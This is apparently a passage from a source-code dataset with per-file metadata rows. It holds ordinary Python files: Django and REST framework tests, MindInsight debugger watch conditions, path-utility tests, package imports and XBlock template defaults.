testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('core.Candidate', assignment_group=testgroup, _quantity=50)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
baker.make('core.Examiner', assignmentgroup=testgroup, _quantity=50)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset,
_quantity=20)
baker.make('devilry_group.GroupComment',
user=examiner.relatedexaminer.user,
user_role='examiner',
feedback_set=testfeedbackset,
_quantity=20)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertNumQueries(18):
self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin,
cradmin_instance=mock_cradmininstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_num_queries_with_commentfiles(self):
"""
NOTE: (works as it should)
Checking that no more queries are executed even though the
:func:`devilry.devilry_group.feedbackfeed_builder.FeedbackFeedTimelineBuilder.__get_feedbackset_queryset`
duplicates comment_file query.
"""
period = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('core.Candidate', assignment_group=testgroup, _quantity=50)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
baker.make('core.Examiner', assignmentgroup=testgroup, _quantity=50)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
comment = baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset)
comment2 = baker.make('devilry_group.GroupComment',
user=examiner.relatedexaminer.user,
user_role='examiner',
feedback_set=testfeedbackset)
baker.make('devilry_comment.CommentFile',
filename='test.py',
comment=comment,
_quantity=20)
baker.make('devilry_comment.CommentFile',
filename='test2.py',
comment=comment2,
_quantity=20)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertNumQueries(18):
self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin,
cradmin_instance=mock_cradmininstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count()) | 60.887097 | 120 | 0.672781 | 2,917 | 30,200 | 6.693178 | 0.091875 | 0.053473 | 0.034624 | 0.030424 | 0.881735 | 0.857099 | 0.83825 | 0.82985 | 0.801834 | 0.791487 | 0 | 0.006288 | 0.246987 | 30,200 | 496 | 121 | 60.887097 | 0.852249 | 0.054404 | 0 | 0.708625 | 0 | 0 | 0.131229 | 0.080451 | 0 | 0 | 0 | 0 | 0.104895 | 1 | 0.060606 | false | 0.011655 | 0.030303 | 0 | 0.097902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da60befdcb7883155a23d84abd24cad7a7fea843 | 19,895 | py | Python | mindinsight/debugger/conditionmgr/condition_list.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 216 | 2020-03-28T02:11:56.000Z | 2022-03-31T06:20:09.000Z | mindinsight/debugger/conditionmgr/condition_list.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 13 | 2020-03-31T03:00:12.000Z | 2021-01-03T13:01:06.000Z | mindinsight/debugger/conditionmgr/condition_list.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 21 | 2020-03-28T02:41:06.000Z | 2021-11-24T12:20:25.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Condition list.
This module provide the detail conditions list.
"""
from mindinsight.debugger.conditionmgr.condition import Condition
from mindinsight.debugger.conditionmgr.condition import OptimizePhaseEnum
from mindinsight.debugger.conditionmgr.condition import ConditionParameter
from mindinsight.debugger.conditionmgr.condition import ValueTypeEnum
from mindinsight.debugger.conditionmgr.condition import TargetTypeEnum
from mindinsight.debugger.conditionmgr.condition import PlatformEnum
from mindinsight.debugger.conditionmgr.condition import ParamTypeEnum
from mindinsight.debugger.conditionmgr.condition import ConditionIdEnum
from mindinsight.debugger.conditionmgr.condition import ParamNameEnum
from mindinsight.debugger.conditionmgr.condition import check_initialization_available
from mindinsight.debugger.conditionmgr.condition import check_normal_param_range
from mindinsight.debugger.conditionmgr.condition import check_percentage_param_range
from mindinsight.debugger.conditionmgr.condition import check_abs_param_range, check_positive_param_range
CONDITION_LIST = [
Condition(
condition_id=ConditionIdEnum.WEIGHT_INITIALIZATION,
abbr="WI",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_initialization
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ZERO_PERCENTAGE_GE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
default_value=100
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1),
availability_test_func=check_initialization_available
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_OVERFLOW,
abbr="WO",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_TOO_LARGE,
abbr="WL",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_TOO_SMALL,
abbr="WS",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_VANISHING,
abbr="GV",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_TOO_LARGE,
abbr="GL",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.GRADIENT_EXPLODING,
abbr="GE",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.GRADIENT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_OVERFLOW,
abbr="TO",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_general_overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.OPERATOR_OVERFLOW,
abbr="OO",
# Send this condition to MindSpore will use WatchCondition.Condition.overflow
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND,),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_TOO_LARGE,
abbr="TL",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_TOO_SMALL,
abbr="TS",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
),
ConditionParameter(
name=ParamNameEnum.MEAN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_ALL_ZERO,
abbr="TZ",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_all_zero
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ZERO_PERCENTAGE_GE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
default_value=100
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_NOT_CHANGED,
abbr="WNC",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_not_changed
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RTOL,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-5
),
ConditionParameter(
name=ParamNameEnum.ATOL,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-8,
visible_on_ui=False
),
ConditionParameter(
name=ParamNameEnum.EQUAL_NAN,
value_type=ValueTypeEnum.BOOL,
support_disable=False,
default_value=False,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_CHANGE_TOO_LARGE,
abbr="WCL",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_change_too_large
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_UPDATE_RATIO_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-1
),
ConditionParameter(
name=ParamNameEnum.EPSILON,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-9,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.WEIGHT_CHANGE_TOO_SMALL,
abbr="WCS",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_change_too_small
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.ABS_MEAN_UPDATE_RATIO_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range,
default_value=1e-4
),
ConditionParameter(
name=ParamNameEnum.EPSILON,
value_type=ValueTypeEnum.FLOAT64,
support_disable=False,
default_value=1e-9,
visible_on_ui=False
)
],
supported_target_type=TargetTypeEnum.WEIGHT,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.ACTIVATION_RANGE,
abbr="AR",
# Send this condition to MindSpore will use WatchCondition.Condition.activation_range
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RANGE_START_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_END_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_positive_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
)
],
supported_target_type=TargetTypeEnum.ACTIVATION,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
),
Condition(
condition_id=ConditionIdEnum.TENSOR_RANGE,
abbr="TR",
# Send this condition to MindSpore will use WatchCondition.Condition.tensor_range
optimize_phase=OptimizePhaseEnum.TENSOR_CHECK,
parameters=[
ConditionParameter(
name=ParamNameEnum.RANGE_START_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_END_INCLUSIVE,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_normal_param_range,
param_type=ParamTypeEnum.SUPPORT_PARAM
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.RANGE_PERCENTAGE_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_percentage_param_range,
required_params=[ParamNameEnum.RANGE_START_INCLUSIVE.value, ParamNameEnum.RANGE_END_INCLUSIVE.value]
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_LT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_positive_param_range
),
ConditionParameter(
name=ParamNameEnum.MAX_MIN_GT,
value_type=ValueTypeEnum.FLOAT64,
valid_test_func=check_abs_param_range
)
],
supported_target_type=TargetTypeEnum.TENSOR,
supported_platforms=(PlatformEnum.ASCEND, PlatformEnum.GPU),
minimum_debugger_capability=(1, 1)
)
]
| 41.708595 | 116 | 0.642071 | 1,810 | 19,895 | 6.729282 | 0.098343 | 0.038588 | 0.135057 | 0.109524 | 0.901724 | 0.892447 | 0.855501 | 0.84647 | 0.84647 | 0.819212 | 0 | 0.010814 | 0.293491 | 19,895 | 476 | 117 | 41.796218 | 0.85572 | 0.10862 | 0 | 0.821918 | 0 | 0 | 0.002091 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02968 | 0 | 0.02968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e5e730a138c62acd55624051a4f38367902078f0 | 160 | py | Python | loldib/getratings/models/NA/na_malzahar/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_malzahar/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_malzahar/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from .na_malzahar_top import *
from .na_malzahar_jng import *
from .na_malzahar_mid import *
from .na_malzahar_bot import *
from .na_malzahar_sup import *
| 26.666667 | 31 | 0.78125 | 25 | 160 | 4.6 | 0.36 | 0.26087 | 0.608696 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 160 | 5 | 32 | 32 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e5f5fe13767b86ced12e163cc932e1343bef3505 | 2,060 | py | Python | tests/test_path.py | OctaveLauby/olutils | 9d0741fe2a3ce527be60be2bf1a6904c3340e488 | [
"Apache-2.0"
] | 1 | 2020-10-23T17:11:42.000Z | 2020-10-23T17:11:42.000Z | tests/test_path.py | OctaveLauby/olutils | 9d0741fe2a3ce527be60be2bf1a6904c3340e488 | [
"Apache-2.0"
] | 4 | 2019-05-09T12:53:33.000Z | 2020-12-03T13:49:26.000Z | tests/test_path.py | OctaveLauby/olutils | 9d0741fe2a3ce527be60be2bf1a6904c3340e488 | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from olutils.storing import write_txt
import olutils.path as lib
def test_get_next_path_index(tmpdir):
path_frmt = os.path.join(tmpdir.strpath, "file_{}.txt")
assert lib.get_next_path_index(path_frmt) == 1
assert lib.get_next_path_index(path_frmt, start=10) == 10
write_txt("", path_frmt.format(10))
assert lib.get_next_path_index(path_frmt) == 1
assert lib.get_next_path_index(path_frmt, start=10) == 11
with pytest.raises(ValueError):
lib.get_next_path("file_{}_{}.txt")
with pytest.raises(ValueError):
lib.get_next_path("file.txt")
with pytest.raises(ValueError):
lib.get_next_path("file_{index}.txt")
def test_get_next_path(tmpdir):
path_frmt = os.path.join(tmpdir.strpath, "file_{}.txt")
path_frmt_2 = os.path.join(tmpdir.strpath, "file_{:03d}.txt")
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_10.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=10) == os.path.join(tmpdir.strpath, "file_010.txt")
write_txt("", path_frmt.format(10))
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_11.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=10) == os.path.join(tmpdir.strpath, "file_010.txt")
write_txt("", path_frmt.format(100))
assert lib.get_next_path(path_frmt) == os.path.join(tmpdir.strpath, "file_1.txt")
assert lib.get_next_path(path_frmt, start=10) == os.path.join(tmpdir.strpath, "file_11.txt")
assert lib.get_next_path(path_frmt_2) == os.path.join(tmpdir.strpath, "file_001.txt")
assert lib.get_next_path(path_frmt_2, start=100) == os.path.join(tmpdir.strpath, "file_101.txt")
| 43.829787 | 100 | 0.72233 | 344 | 2,060 | 4.034884 | 0.104651 | 0.126801 | 0.166427 | 0.191643 | 0.92219 | 0.896254 | 0.876801 | 0.876801 | 0.87464 | 0.848703 | 0 | 0.036728 | 0.12767 | 2,060 | 46 | 101 | 44.782609 | 0.735671 | 0 | 0 | 0.558824 | 0 | 0 | 0.101942 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e5ff55af64bca465d8c87ffcce6cb76b6c6c33dc | 2,964 | py | Python | nesting/default_data.py | hrvojevu/xblock-nesting | fd56f983f5378bd6f3e72c3cdb0a7430965a4433 | [
"MIT"
] | null | null | null | nesting/default_data.py | hrvojevu/xblock-nesting | fd56f983f5378bd6f3e72c3cdb0a7430965a4433 | [
"MIT"
] | null | null | null | nesting/default_data.py | hrvojevu/xblock-nesting | fd56f983f5378bd6f3e72c3cdb0a7430965a4433 | [
"MIT"
] | null | null | null | DEFAULT_STYLES = {
'margin': '0',
'padding': '10px',
'border-top': '0',
'border-right': '0',
'border-bottom': '0',
'border-left': '0'
}
DEFAULT_TEMPLATES = {
'template-2': {
'children': [
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'category': 'html',
'children': []
},
{
'id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
}
]
},
{
'id': 'nesting-2',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
}
]
}
]
},
'template-1': {
'children': [
{
'id': 'nesting-1',
'category': 'nesting',
'width': 70,
'children': [
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-1',
'category': 'video',
'type': 'video',
'children': []
},
{
'parent_id': 'nesting-1',
'category': 'html',
'children': []
},
{
'id': 'nesting-3',
'parent_id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-3',
'category': 'html',
'children': []
}
]
},
{
'id': 'nesting-4',
'parent_id': 'nesting-1',
'category': 'nesting',
'width': 50,
'children': [
{
'parent_id': 'nesting-4',
'category': 'html',
'children': []
}
]
}
]
},
{
'id': 'nesting-2',
'category': 'nesting',
'width': 30,
'children': [
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
},
{
'parent_id': 'nesting-2',
'category': 'html',
'children': []
}
]
}
]
}
}
| 21.021277 | 41 | 0.316127 | 180 | 2,964 | 5.116667 | 0.161111 | 0.19544 | 0.325733 | 0.299674 | 0.855592 | 0.824104 | 0.798046 | 0.756786 | 0.659066 | 0.581976 | 0 | 0.027797 | 0.502362 | 2,964 | 140 | 42 | 21.171429 | 0.59661 | 0 | 0 | 0.467626 | 0 | 0 | 0.310391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f914f1ba2b0d00e36b8f6538c76337de800a697e | 12,453 | py | Python | tweets/tests.py | B339r1p/twitter-lite-test-assignment | 8bcd12c1d99959ab0bc748bca6d9ffbbcc1b3598 | [
"MIT"
] | null | null | null | tweets/tests.py | B339r1p/twitter-lite-test-assignment | 8bcd12c1d99959ab0bc748bca6d9ffbbcc1b3598 | [
"MIT"
] | null | null | null | tweets/tests.py | B339r1p/twitter-lite-test-assignment | 8bcd12c1d99959ab0bc748bca6d9ffbbcc1b3598 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from tweets.models import Tweet, Like, Retweet, Comment
class TweetTests(APITestCase):
def test_create_tweet(self):
"""
Ensure we can put the tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" Elon Musk SpaceX_project initiated...... ", user=user)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.put(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_tweet(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('tweet-list')
data = {'tweet': tweet.id, "user": user.id}
